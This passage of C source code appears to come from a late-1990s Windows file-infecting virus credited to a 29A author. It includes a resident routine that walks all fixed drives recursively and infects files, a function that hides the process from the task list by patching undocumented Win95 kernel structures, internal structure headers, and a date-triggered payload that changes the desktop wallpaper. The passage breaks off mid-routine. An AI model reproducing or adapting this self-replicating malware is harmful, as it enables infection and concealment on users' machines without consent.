== sizeof(BITMAPINFOHEADER) && pIconImage->icHeader.biPlanes == 1 && pIconImage->icHeader.biBitCount == 4) if (!pIconImages->pLargeIcon && pIconImage->icHeader.biWidth == 32 && pIconImage->icHeader.biHeight == 64) pIconImages->pLargeIcon = pIconImage; else if (!pIconImages->pSmallIcon && pIconImage->icHeader.biWidth == 16 && pIconImage->icHeader.biHeight == 32) pIconImages->pSmallIcon = pIconImage; if (pIconImages->pLargeIcon && pIconImages->pSmallIcon) goto breakall; } while (++nCount < pRsrcType->count); } pRsrcType = (PRESOURCE_TYPE) ((PBYTE)pRsrcType + sizeof(RESOURCE_TYPE) + pRsrcType->count * sizeof(RESOURCE_INFO)); } breakall:; } } #endif #ifdef tsr __inline VOID SeekTSR() { DWORD cBytes; PBYTE pszDrvs, pszDrive; UINT uDriveType; if (!(cBytes = GetLogicalDriveStrings(0, NULL)) || !(pszDrvs = (PBYTE)GlobalAlloc(LPTR, cBytes + 1))) return; if (GetLogicalDriveStrings(cBytes, pszDrvs) - 1 < cBytes) { #if PREV_LAPSE Sleep(PREV_LAPSE * 1000); #endif do { pszDrive = pszDrvs; do { if ((uDriveType = GetDriveType(pszDrive)) <= DRIVE_REMOVABLE || uDriveType == DRIVE_CDROM) continue; #ifdef msgbox if (CancelFolderSeek) CancelFolderSeek = FALSE; #endif WalkFolder(lstrcpy(PathName, pszDrive)); } while (*(pszDrive += lstrlen(pszDrive) + 1)); #ifdef msgbox if (CancelFolderSeek) break; #endif } while (TRUE); #ifdef msgbox CloseHandle(hMutex); #if 1 MessageBox(NULL, "TSR: Mutex destroyed!", szCopyright, MB_OK); #endif #endif } #ifdef msgbox GlobalFree(pszDrvs); #endif } VOID WalkFolder(PBYTE PathName) { DWORD cBytes; HANDLE hFindFile; Sleep(SEEK_LAPSE * 1000); InfectPath(PathName, cBytes = lstrlen(PathName)); if (PathName[cBytes - 1] != '\\') PathName[cBytes++] = '\\'; *(PDWORD)(PathName + cBytes) = '*.*'; if ((hFindFile = FindFirstFile(PathName, &FindDataTSR)) == INVALID_HANDLE_VALUE) return; do { #ifdef msgbox if (CancelFolderSeek) break; #endif if (!IsFolder(&FindDataTSR)) continue; lstrcpy(PathName + cBytes, FindDataTSR.cFileName); WalkFolder(PathName); //recurse folders.. } while (FindNextFile(hFindFile, &FindDataTSR)); FindClose(hFindFile); } //VOID HideProcess() { //Unsecure way to // PTHREAD_DATABASE pThreadDB = GetThreadDB(); //hide our process. // if (pThreadDB->pProcess->Type != K32OBJ_PROCESS) //This is undocumented // return; //Microsoft stuff, // pThreadDB->pProcess->flags |= fServiceProcess; //likely to GP fault! //} //Code bellow is better VOID HideProcess() { { //do it the legal undoc. way.. DWORD (WINAPI *pfnRegisterServiceProcess)(DWORD, DWORD); pfnRegisterServiceProcess = (DWORD (WINAPI *)(DWORD, DWORD)) GetProcAddress(GetModuleHandle("KERNEL32"), "RegisterServiceProcess"); if (pfnRegisterServiceProcess) pfnRegisterServiceProcess(0, 1); } { //do it the ilegal dirty way, just in case.. PPROCESS_DATABASE pProcessDB = GetProcessDB(); HANDLE hProcess = GetCurrentProcess(); DWORD dwBuffer, nBytes; if (!ReadProcessMemory(hProcess, &pProcessDB->Type, &dwBuffer, 4, &nBytes) || nBytes != 4 || dwBuffer != K32OBJ_PROCESS || !ReadProcessMemory(hProcess, &pProcessDB->flags, &dwBuffer, 4, &nBytes) || nBytes != 4) return; dwBuffer |= fServiceProcess; WriteProcessMemory(hProcess, &pProcessDB->flags, &dwBuffer, 4, &nBytes); } } __inline PPROCESS_DATABASE GetProcessDB() { PPROCESS_DATABASE pProcessDB; DWORD nBytes; return (!ReadProcessMemory(GetCurrentProcess(), &GetThreadDB()->pProcess, &pProcessDB, 4, &nBytes) || nBytes != 4) ? NULL : pProcessDB; } __inline PTHREAD_DATABASE GetThreadDB() { __asm push -10h __asm pop eax __asm add eax,fs:[TIB.ptibSelf + (eax + 10h)] //(eax + 10h) = 0 } #endif //end ????????????????????????????????????????????????????????????????[win32red.c]?? ????????????????????????????????????????????????????????????????[win95sys.h]?? //WIN95SYS - Win95 System Structures // //Some powerful Win95 structs that Microsoft dont want us to know about. //These are much like the Win95 implementation of the SFTs found in DOS. //Last minute note (Nov/10/98): Unfortunately some of the fields in these // structures broke on Win98. More especifically I dunno where the Process // database structure lies in memory. However the 'RegisterServiceProcess' // API is still exported from KERNEL32 and so our nasty trick with the // 'Task Bar' still works there. Under NT this story is out of scope. JQ. //Kernel32 objects #define K32OBJ_SEMAPHORE 0x1 #define K32OBJ_EVENT 0x2 #define K32OBJ_MUTEX 0x3 #define K32OBJ_CRITICAL_SECTION 0x4 #define K32OBJ_PROCESS 0x5 #define K32OBJ_THREAD 0x6 #define K32OBJ_FILE 0x7 #define K32OBJ_CHANGE 0x8 #define K32OBJ_CONSOLE 0x9 #define K32OBJ_SCREEN_BUFFER 0xA #define K32OBJ_MEM_MAPPED_FILE 0xB #define K32OBJ_SERIAL 0xC #define K32OBJ_DEVICE_IOCTL 0xD #define K32OBJ_PIPE 0xE #define K32OBJ_MAILSLOT 0xF #define K32OBJ_TOOLHELP_SNAPSHOT 0x10 #define K32OBJ_SOCKET 0x11 //Process Database flags #define fDebugSingle 0x00000001 #define fCreateProcessEvent 0x00000002 #define fExitProcessEvent 0x00000004 #define fWin16Process 0x00000008 #define fDosProcess 0x00000010 #define fConsoleProcess 0x00000020 #define fFileApisAreOem 0x00000040 #define fNukeProcess 0x00000080 #define fServiceProcess 0x00000100 #define fLoginScriptHack 0x00000800 //Thread Database flags #define fCreateThreadEvent 0x00000001 #define fCancelExceptionAbort 0x00000002 #define fOnTempStack 0x00000004 #define fGrowableStack 0x00000008 #define fDelaySingleStep 0x00000010 #define fOpenExeAsImmovableFile 0x00000020 #define fCreateSuspended 0x00000040 #define fStackOverflow 0x00000080 #define fNestedCleanAPCs 0x00000100 #define fWasOemNowAnsi 0x00000200 #define fOKToSetThreadOem 0x00000400 #pragma pack(1) //MODREF and IMTE structures typedef struct _MODREF { struct _MODREF *pNextModRef; // 00h DWORD un1; // 04h DWORD un2; // 08h DWORD un3; // 0Ch WORD mteIndex; // 10h WORD un4; // 12h DWORD un5; // 14h PVOID ppdb; // 18h Pointer to process database DWORD un6; // 1Ch DWORD un7; // 20h DWORD un8; // 24h } MODREF, *PMODREF; typedef struct _IMTE { DWORD un1; // 00h PIMAGE_NT_HEADERS pNTHdr; // 04h DWORD un2; // 08h PSTR pszFileName; // 0Ch PSTR pszModName; // 10h WORD cbFileName; // 14h WORD cbModName; // 16h DWORD un3; // 18h DWORD cSections; // 1Ch DWORD un5; // 20h DWORD baseAddress; // 24h WORD hModule16; // 28h WORD cUsage; // 2Ah DWORD un7; // 2Ch PSTR pszFileName2; // 30h WORD cbFileName2; // 34h DWORD pszModName2; // 36h WORD cbModName2; // 3Ah } IMTE, *PIMTE; //Process Database structure typedef struct _ENVIRONMENT_DATABASE { PSTR pszEnvironment; // 00h Pointer to Environment DWORD un1; // 04h PSTR pszCmdLine; // 08h Pointer to command line PSTR pszCurrDirectory; // 0Ch Pointer to current directory LPSTARTUPINFOA pStartupInfo;// 10h Pointer to STARTUPINFOA struct HANDLE hStdIn; // 14h Standard Input HANDLE hStdOut; // 18h Standard Output HANDLE hStdErr; // 1Ch Standard Error DWORD un2; // 20h DWORD InheritConsole; // 24h DWORD BreakType; // 28h DWORD BreakSem; // 2Ch DWORD BreakEvent; // 30h DWORD BreakThreadID; // 34h DWORD BreakHandlers; // 38h } ENVIRONMENT_DATABASE, *PENVIRONMENT_DATABASE; typedef struct _HANDLE_TABLE_ENTRY { DWORD flags; // Valid flags depend on what type of object this is PVOID pObject; // Pointer to the object that the handle refers to } HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY; typedef struct _HANDLE_TABLE { DWORD cEntries; // Max number of handles in table HANDLE_TABLE_ENTRY array[1]; // An array (number is given by cEntries) } HANDLE_TABLE, *PHANDLE_TABLE; typedef struct _PROCESS_DATABASE { DWORD Type; // 00h KERNEL32 object type (5) DWORD cReference; // 04h Number of references to process DWORD un1; // 08h DWORD someEvent; // 0Ch An event object (What's it used for???) DWORD TerminationStatus; // 10h Returned by GetExitCodeProcess DWORD un2; // 14h DWORD DefaultHeap; // 18h Address of the process heap DWORD MemoryContext; // 1Ch pointer to the process's context DWORD flags; // 20h // 0x00000001 - fDebugSingle // 0x00000002 - fCreateProcessEvent // 0x00000004 - fExitProcessEvent // 0x00000008 - fWin16Process // 0x00000010 - fDosProcess // 0x00000020 - fConsoleProcess // 0x00000040 - fFileApisAreOem // 0x00000080 - fNukeProcess // 0x00000100 - fServiceProcess // 0x00000800 - fLoginScriptHack DWORD pPSP; // 24h Linear address of PSP? WORD PSPSelector; // 28h WORD MTEIndex; // 2Ah WORD cThreads; // 2Ch WORD cNotTermThreads; // 2Eh WORD un3; // 30h WORD cRing0Threads; // 32h number of ring 0 threads HANDLE HeapHandle; // 34h Heap to allocate handle tables out of // This seems to always be the KERNEL32 heap HTASK W16TDB; // 38h Win16 Task Database selector DWORD MemMapFiles; // 3Ch memory mapped file list (?) PENVIRONMENT_DATABASE pEDB; // 40h Pointer to Environment Database PHANDLE_TABLE pHandleTable; // 44h Pointer to process handle table struct _PROCESS_DATABASE *ParentPDB; // 48h Parent process database PMODREF MODREFlist; // 4Ch Module reference list DWORD ThreadList; // 50h Threads in this process DWORD DebuggeeCB; // 54h Debuggee Context block? DWORD LocalHeapFreeHead; // 58h Head of free list in process heap DWORD InitialRing0ID; // 5Ch CRITICAL_SECTION crst; // 60h DWORD un4[3]; // 78h DWORD pConsole; // 84h Pointer to console for process DWORD tlsInUseBits1; // 88h // Represents TLS indices 0 - 31 DWORD tlsInUseBits2; // 8Ch // Represents TLS indices 32 - 63 DWORD ProcessDWORD; // 90h struct _PROCESS_DATABASE *ProcessGroup; // 94h DWORD pExeMODREF; // 98h pointer to EXE's MODREF DWORD TopExcFilter; // 9Ch Top Exception Filter? DWORD BasePriority; // A0h Base scheduling priority for process DWORD HeapOwnList; // A4h Head of the list of process heaps DWORD HeapHandleBlockList;// A8h Pointer to head of heap handle block list DWORD pSomeHeapPtr; // ACh normally zero, but can a pointer to a // moveable handle block in the heap DWORD pConsoleProvider; // B0h Process that owns the console we're using? WORD EnvironSelector; // B4h Selector containing process environment WORD ErrorMode; // B6H SetErrorMode value (also thunks to Win16) DWORD pevtLoadFinished; // B8h Pointer to event LoadFinished? WORD UTState; // BCh } PROCESS_DATABASE, *PPROCESS_DATABASE; //TIB (Thread Information Block) structure typedef struct _SEH_record { struct _SEH_record *pNext; FARPROC pfnHandler; } SEH_record, *PSEH_record; // This is semi-documented in the NTDDK.H file from the NT DDK typedef struct _TIB { PSEH_record pvExcept; // 00h Head of exception record list PVOID pvStackUserTop; // 04h Top of user stack PVOID pvStackUserBase; // 08h Base of user stack WORD pvTDB; // 0Ch TDB WORD pvThunksSS; // 0Eh SS selector used for thunking to 16 bits DWORD SelmanList; // 10h PVOID pvArbitrary; // 14h Available for application use struct _tib *ptibSelf; // 18h Linear address of TIB structure WORD TIBFlags; // 1Ch WORD Win16MutexCount; // 1Eh DWORD DebugContext; // 20h DWORD pCurrentPriority; // 24h DWORD pvQueue; // 28h Message Queue selector PVOID *pvTLSArray; // 2Ch Thread Local Storage array } TIB, *PTIB; //TDBX structure typedef struct _TDBX { DWORD ptdb; // 00h // PTHREAD_DATABASE DWORD ppdb; // 04h // PPROCESDS_DATABASE DWORD ContextHandle; // 08h DWORD un1; // 0Ch DWORD TimeOutHandle; // 10h DWORD WakeParam; // 14h DWORD BlockHandle; // 18h DWORD BlockState; // 1Ch DWORD SuspendCount; // 20h DWORD SuspendHandle; // 24h DWORD MustCompleteCount; // 28h DWORD WaitExFlags; // 2Ch // 0x00000001 - WAITEXBIT // 0x00000002 - WAITACKBIT // 0x00000004 - SUSPEND_APC_PENDING // 0x00000008 - SUSPEND_TERMINATED // 0x00000010 - BLOCKED_FOR_TERMINATION // 0x00000020 - EMULATE_NPX // 0x00000040 - WIN32_NPX // 0x00000080 - EXTENDED_HANDLES // 0x00000100 - FROZEN // 0x00000200 - DONT_FREEZE // 0x00000400 - DONT_UNFREEZE // 0x00000800 - DONT_TRACE // 0x00001000 - STOP_TRACING // 0x00002000 - WAITING_FOR_CRST_SAFE // 0x00004000 - CRST_SAFE // 0x00040000 - BLOCK_TERMINATE_APC DWORD SyncWaitCount; // 30h DWORD QueuedSyncFuncs; // 34h DWORD UserAPCList; // 38h DWORD KernAPCList; // 3Ch DWORD pPMPSPSelector; // 40h DWORD BlockedOnID; // 44h DWORD un2[7]; // 48h DWORD TraceRefData; // 64h DWORD TraceCallBack; // 68h DWORD TraceEventHandle; // 6Ch WORD TraceOutLastCS; // 70h WORD K16TDB; // 72h WORD K16PDB; // 74h WORD DosPDBSeg; // 76h WORD ExceptionCount; // 78h } TDBX, *PTDBX; //Thread Database structure typedef struct _THREAD_DATABASE { DWORD Type; // 00h DWORD cReference; // 04h PPROCESS_DATABASE pProcess; // 08h DWORD someEvent; // 0Ch An event object (What's it used for???) DWORD pvExcept; // 10h This field through field 3CH is a TIB // structure (see TIB.H) DWORD TopOfStack; // 14h DWORD StackLow; // 18h WORD W16TDB; // 1Ch WORD StackSelector16; // 1Eh Used when thunking down to 16 bits DWORD SelmanList; // 20h DWORD UserPointer; // 24h PTIB pTIB; // 28h WORD TIBFlags; // 2Ch TIBF_WIN32 = 1, TIBF_TRAP = 2 WORD Win16MutexCount; // 2Eh DWORD DebugContext; // 30h PDWORD pCurrentPriority; // 34h DWORD MessageQueue; // 38h DWORD pTLSArray; // 3Ch PPROCESS_DATABASE pProcess2;// 40h Another copy of the thread's process??? DWORD Flags; // 44h // 0x00000001 - fCreateThreadEvent // 0x00000002 - fCancelExceptionAbort // 0x00000004 - fOnTempStack // 0x00000008 - fGrowableStack // 0x00000010 - fDelaySingleStep // 0x00000020 - fOpenExeAsImmovableFile // 0x00000040 - fCreateSuspended // 0x00000080 - fStackOverflow // 0x00000100 - fNestedCleanAPCs // 0x00000200 - fWasOemNowAnsi // 0x00000400 - fOKToSetThreadOem DWORD TerminationStatus; // 48h Returned by GetExitCodeThread WORD TIBSelector; // 4Ch WORD EmulatorSelector; // 4Eh DWORD cHandles; // 50h DWORD WaitNodeList; // 54h DWORD un4; // 58h DWORD Ring0Thread; // 5Ch PTDBX pTDBX; // 60 DWORD StackBase; // 64h DWORD TerminationStack; // 68h DWORD EmulatorData; // 6Ch DWORD GetLastErrorCode; // 70h DWORD DebuggerCB; // 74h DWORD DebuggerThread; // 78h PCONTEXT ThreadContext; // 7Ch // register context defined in WINNT.H DWORD Except16List; // 80h DWORD ThunkConnect; // 84h DWORD NegStackBase; // 88h DWORD CurrentSS; // 8Ch DWORD SSTable; // 90h DWORD ThunkSS16; // 94h DWORD TLSArray[64]; // 98h DWORD DeltaPriority; // 198h // The retail version breaks off somewhere around here. // All the remaining fields are most likely only in the debug version DWORD un5[7]; // 19Ch DWORD pCreateData16; // 1B8h DWORD APISuspendCount; // 1BCh # of times SuspendThread has been called DWORD un6; // 1C0h DWORD WOWChain; // 1C4h WORD wSSBig; // 1C8h WORD un7; // 1CAh DWORD lp16SwitchRec; // 1CCh DWORD un8[6]; // 1D0h DWORD pSomeCritSect1; // 1E8h DWORD pWin16Mutex; // 1ECh DWORD pWin32Mutex; // 1F0h DWORD pSomeCritSect2; // 1F4h DWORD un9; // 1F8h DWORD ripString; // 1FCh DWORD LastTlsSetValueEIP[64]; // 200h (parallel to TlsArray, contains EIP // where TLS value was last set from) } THREAD_DATABASE, *PTHREAD_DATABASE; ????????????????????????????????????????????????????????????????[win95sys.h]?? ????????????????????????????????????????????????????????????????[jqcoding.h]?? /* JQCODING.H - Supertiny/fast Compression/Encryption library - C/C++ header (c) 1998 by Jacky Qwerty/29A. */ unsigned long __stdcall jq_encode(void *out, /* output stream ptr */ const void *in, /* input stream ptr */ unsigned long in_len, /* input stream length */ void *mem64k); /* work mem ptr */ unsigned long __stdcall jq_decode(void *out, /* output stream ptr */ const void *in, /* input stream ptr */ unsigned long in_len, /* input stream length */ void *mem64k); /* work mem ptr */ ????????????????????????????????????????????????????????????????[jqcoding.h]?? ????????????????????????????????????????????????????????????????[winicons.h]?? // Win16/32 related Icon structures.. #include #define SIZEOF_LARGE_ICON 0x2E8 #define SIZEOF_SMALL_ICON 0x128 #define SIZEOF_ICONS (SIZEOF_LARGE_ICON + SIZEOF_SMALL_ICON) // Icon format (ID = 03h) typedef struct _ICONIMAGE { BITMAPINFOHEADER icHeader; // DIB header RGBQUAD icColors[1]; // Color table BYTE icXOR[1]; // DIB bits for XOR mask BYTE icAND[1]; // DIB bits for AND mask } ICONIMAGE, *PICONIMAGE; // Group Icon format (ID = 0Eh) typedef struct _ICONDIRENTRY { BYTE bWidth; // Width, in pixels, of the image BYTE bHeight; // Height, in pixels, of the image BYTE bColorCount; // Number of colors in image (0 if >=8bpp) BYTE bReserved; // Reserved WORD wPlanes; // Color Planes WORD wBitCount; // Bits per pixel DWORD dwBytesInRes; // how many bytes in this resource? WORD nID; // the ID } ICONDIRENTRY, *PICONDIRENTRY; #define SIZEOF_ICONDIRENTRY sizeof(ICONDIRENTRY) typedef struct _ICONDIR { WORD idReserved; // Reserved (must be 0) WORD idType; // Resource type (1 for icons) WORD idCount; // How many images? ICONDIRENTRY idEntries[1]; // The entries for each image } ICONDIR, *PICONDIR; #define SIZEOF_ICONDIR 6 ????????????????????????????????????????????????????????????????[winicons.h]?? ??????????????????????????????????????????????????????????????????[winres.h]?? //Win16 (NE) related resource structures.. typedef struct { WORD ID; WORD count; DWORD function; } RESOURCE_TYPE, *PRESOURCE_TYPE; typedef struct { WORD offset; WORD length; WORD flags; WORD ID; WORD handle; WORD usage; } RESOURCE_INFO, *PRESOURCE_INFO; ??????????????????????????????????????????????????????????????????[winres.h]?? ????????????????????????????????????????????????????????????????[jq29aico.h]?? #ifdef compr BYTE jq29aComprIcons[] = { 0xd7,0x45,0xb1,0x44,0xc6,0x7d,0x61,0xa8,0x96,0xc0,0x9d,0x74,0xbb, 0x6d,0xbc,0x6b,0xa0,0xa6,0x57,0xc8,0x76,0x77,0x64,0x0c,0x7e,0x9a, 0x2f,0xb8,0xd2,0xcd,0xbc,0xa3,0xa0,0x33,0x50,0x3b,0x90,0x3b,0x1f, 0x46,0xe9,0xb2,0x7f,0xe4,0xd0,0x28,0x13,0x4e,0xfa,0x92,0x3e,0xcc, 0xd1,0xc3,0x92,0x95,0x1c,0x5e,0xda,0xaf,0x45,0x91,0x44,0xee,0xc7, 0x95,0x31,0x04,0x13,0x3d,0x1c,0x23,0x5d,0xa1,0x59,0xa9,0x34,0x0e, 0x7a,0x92,0x3f,0x65,0xac,0x3e,0x67,0xa8,0x4b,0x8d,0x7c,0x9e,0x27, 0x55,0xcc,0x83,0x60,0xa6,0x57,0xc8,0xf6,0x8a,0x72,0xff,0xe5,0xd1, 0xb9,0x14,0x33,0x7d,0xe1,0xa4,0x53,0xc0,0x9b,0x50,0xbb,0x10,0x3b, 0x6d,0xc1,0xe4,0xae,0xda,0x11,0x41,0xe1,0x1a,0x42,0x9d,0x1a,0xb3, 0x00,0x54,0x32,0x51,0x17,0x08,0xb9,0xe5,0x50,0x49,0x6e,0x4c,0x0c, 0x9f,0x26,0x16,0xcb,0x16,0xea,0xb6,0xa9,0x91,0xcc,0xb3,0x63,0xed, 0xf9,0xbc,0xa1,0x2c,0x10,0x75,0x06,0x60,0xd2,0x51,0xd0,0x01,0xcf, 0xda,0xae,0xf1,0x14,0x97,0xa3,0x32,0x1c,0x7e,0x8e,0xca,0x90,0x2b, 0x4e,0x4a,0x6c,0x82,0x91,0xd3,0xed,0x96,0x67,0xca,0xef,0x05,0x07, 0x3b,0xb6,0x1e,0x87,0xfb,0xe3,0x06,0xfe,0x2f,0xca,0x08,0x85,0x16, 0x2f,0xca,0x3f,0x83,0x9e,0x59,0x11,0xfd,0x97,0x46,0xc9,0x31,0x9b, 0x97,0x95,0x37,0x07,0x02,0x6f,0xc5,0x2b,0xce,0xf7,0x95,0x31,0x1a, 0x82,0x72,0xdf,0xd8,0x4c,0x3e,0x68,0xd9,0x1f,0x83,0x9d,0x6e,0xde, 0xa7,0x55,0xb9,0x04,0x93,0x40,0xe6,0x2a,0xcf,0x67,0x16,0x37,0x75, 0xf1,0x04,0xd5,0xc7,0x55,0x0c,0xbe,0x9a,0x27,0xc5,0x6c,0x43,0xe0, 0xb5,0x2a,0x31,0x02,0x1f,0x24,0x2b,0xb2,0x9c,0x5c,0xa3,0x5d,0xa0, 0x8b,0x53,0xbc,0x1b,0x5d,0x1f,0x55,0xcc,0xfe,0xe7,0xd5,0xcc,0xfe, 0xe7,0xd5,0xcc,0xfe,0xe7,0xa8,0x36,0x77,0x88,0x96,0x03,0xd2,0x6c, 0xe1,0xee,0x3a,0x54,0xaf,0x5f,0x9d,0xaf,0x8e,0xc8,0x0c,0xc4,0x29, 0xa7,0x0f,0x77,0x1b,0x4f,0xba,0xd0,0xb2,0x6c,0xaf,0xe3,0xaa,0x26, 0x58,0x20,0x00,0x5b,0xf3,0x76,0xf2,0x2c,0xb3,0x59,0xd4,0xa1,0x50, 0x18,0x48,0x00,0x6b,0x2d,0x79,0xee,0xc0,0x04,0x44,0xe2,0xd2,0x59 }; #define SIZEOF_COMPR_ICONS sizeof(jq29aComprIcons) #else BYTE jq29aIcons[] = { 0x28,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x01, 0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x80,0x00,0x00, 0x00,0x80,0x80,0x00,0x80,0x00,0x00,0x00,0x80,0x00,0x80,0x00,0x80, 0x80,0x00,0x00,0xc0,0xc0,0xc0,0x00,0x80,0x80,0x80,0x00,0x00,0x00, 0xff,0x00,0x00,0xff,0x00,0x00,0x00,0xff,0xff,0x00,0xff,0x00,0x00, 0x00,0xff,0x00,0xff,0x00,0xff,0xff,0x00,0x00,0xff,0xff,0xff,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 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0xff,0x10,0x01,0xc1,0xff,0x18,0x03,0xe1,0xf8,0x18,0xe3,0xf0,0xf0, 0x18,0xe3,0xf8,0xe3,0x1c,0xe7,0xf8,0x63,0x1c,0x47,0xfc,0x63,0x1c, 0x47,0xfc,0x63,0x1c,0x47,0x1c,0x63,0x1e,0x0f,0x1c,0x63,0x3e,0x0f, 0x80,0xf0,0x3e,0x0f,0xc1,0xf8,0x7f,0x1f,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0x7f,0xf0,0xf3,0xc0,0x27,0xf0,0x73,0x80,0xe7,0xe7,0x3f, 0x98,0xff,0xe7,0x3f,0x32,0x7f,0xff,0x3f,0x3e,0x7f,0xff,0x3f,0x3e, 0x7f,0xff,0x3f,0x3e,0x7f,0xff,0x3f,0x3e,0x7f,0xff,0x3f,0x3e,0x7f, 0xff,0x3f,0x9c,0xff,0xff,0x3f,0x80,0xff,0xff,0x3f,0xc1,0xff,0xff, 0xff,0xff,0xff,0x28,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x20,0x00, 0x00,0x00,0x01,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00, 0x80,0x00,0x00,0x00,0x80,0x80,0x00,0x80,0x00,0x00,0x00,0x80,0x00, 0x80,0x00,0x80,0x80,0x00,0x00,0xc0,0xc0,0xc0,0x00,0x80,0x80,0x80, 0x00,0x00,0x00,0xff,0x00,0x00,0xff,0x00,0x00,0x00,0xff,0xff,0x00, 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0x00,0xf7,0x6f,0xff,0x00,0xf7,0x9f,0x00,0x00,0xff,0xff,0xfb,0x00 }; #endif ????????????????????????????????????????????????????????????????[jq29aico.h]?? ?????????????????????????????????????????????????????????????????[payload.c]?? { SYSTEMTIME SystemTime; GetLocalTime(&SystemTime); if ((BYTE)SystemTime.wDay == 29 && (BYTE)SystemTime.wMonth == 0xA) { bPayLoadDay = TRUE; #ifdef compr jq_decode(HostLargeIcon + SIZEOF_ICONS, jq29aComprIcons + SIZEOF_COMPR_ICONS, SIZEOF_COMPR_ICONS, ComprMem); { HANDLE hBmp; DWORD cBytes; if ((cBytes = GetTempPath(MAX_PATH, PathName)) - 1 < MAX_PATH - 1) { if (PathName[cBytes - 1] != '\\') PathName[cBytes++] = '\\'; *(PDWORD)(PathName + cBytes) = '.A92'; *(PDWORD)(PathName + cBytes + 4) = 'PMB'; hBmp = CreateFile(PathName, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); if (hBmp != INVALID_HANDLE_VALUE) if (GetFileSize(hBmp, NULL) == SIZEOF_BMP) { CloseHandle(hBmp); goto SetDeskWallPaper; } else { { PBYTE pSrc = HostLargeIcon; PBYTE pTgt = jq29aBmp + 0xE; DWORD nCount = 0x68; *(PDWORD)(pTgt - 0xE) = 0x80764D42; pTgt[0xA - 0xE] = 0x76; do *pTgt++ = *pSrc++; while (--nCount); ((PBITMAPINFOHEADER)(pTgt - 0x68))->biWidth = 0x100; ((PBITMAPINFOHEADER)(pTgt - 0x68))->biHeight = 0x100; *((PBYTE)&((PBITMAPINFOHEADER)(pTgt - 0x68))->biSizeImage + 1) = 0x80; *(PWORD)&((PBITMAPINFOHEADER)(pTgt - 0x68))->biXPelsPerMeter = 0xECE; *(PWORD)&((PBITMAPINFOHEADER)(pTgt - 0x68))->biYPelsPerMeter = 0xED8; pSrc += 0x200; { DWORD nCountDwords = 32; do { DWORD nCountYPels = 8; DWORD Pix = *((PDWORD)pSrc)++; __asm { mov eax, [Pix] xchg ah, al rol eax, 16 xchg ah, al mov [Pix], eax } do { DWORD PixCopy = Pix; DWORD nCountBits = 32; do { DWORD nCountXPels = 4; do { *pTgt++ = (PixCopy & 0x80000000)? 0x66 : 0; } while (--nCountXPels); PixCopy <<= 1; } while (--nCountBits); } while (--nCountYPels); } while (--nCountDwords); } } { BOOL bBool = WriteFile(hBmp, jq29aBmp, SIZEOF_BMP, &cBytes, NULL); WriteFile(hBmp, jq29aBmp, 0, &cBytes, NULL); CloseHandle(hBmp); if (bBool) { HINSTANCE hInst; SetDeskWallPaper: hInst = LoadLibrary("USER32"); if (hInst) { DWORD (WINAPI *pfnSystemParametersInfo)(DWORD, DWORD, PVOID, DWORD); pfnSystemParametersInfo = (DWORD (WINAPI *)(DWORD, DWORD, PVOID, DWORD)) GetProcAddress(hInst, "SystemParametersInfoA"); if (pfnSystemParametersInfo) 